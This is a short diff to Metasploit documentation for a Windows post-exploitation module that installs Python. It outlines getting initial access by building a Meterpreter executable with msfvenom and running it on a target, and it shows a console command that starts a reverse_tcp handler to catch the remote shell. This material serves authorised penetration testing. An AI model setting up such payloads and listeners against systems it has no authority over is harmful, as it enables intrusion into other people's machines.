rapid7/metasploit-framework/documentation/modules/post/windows/manage/install_python.md

 ## Scenarios

-Get initial access: Create a Meterpreter exe using msfvenom, then transfer it to the target system via web server, SMB, etc. Execute the Meterpreter payload as a non-administrative user.
+Get initial access: Create a Meterpreter exe using msfvenom, then transfer it to the target system via web server, SMB, etc. Execute the payload to get a session.

     msf5 > handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp
     [*] Payload handler running as background job 0.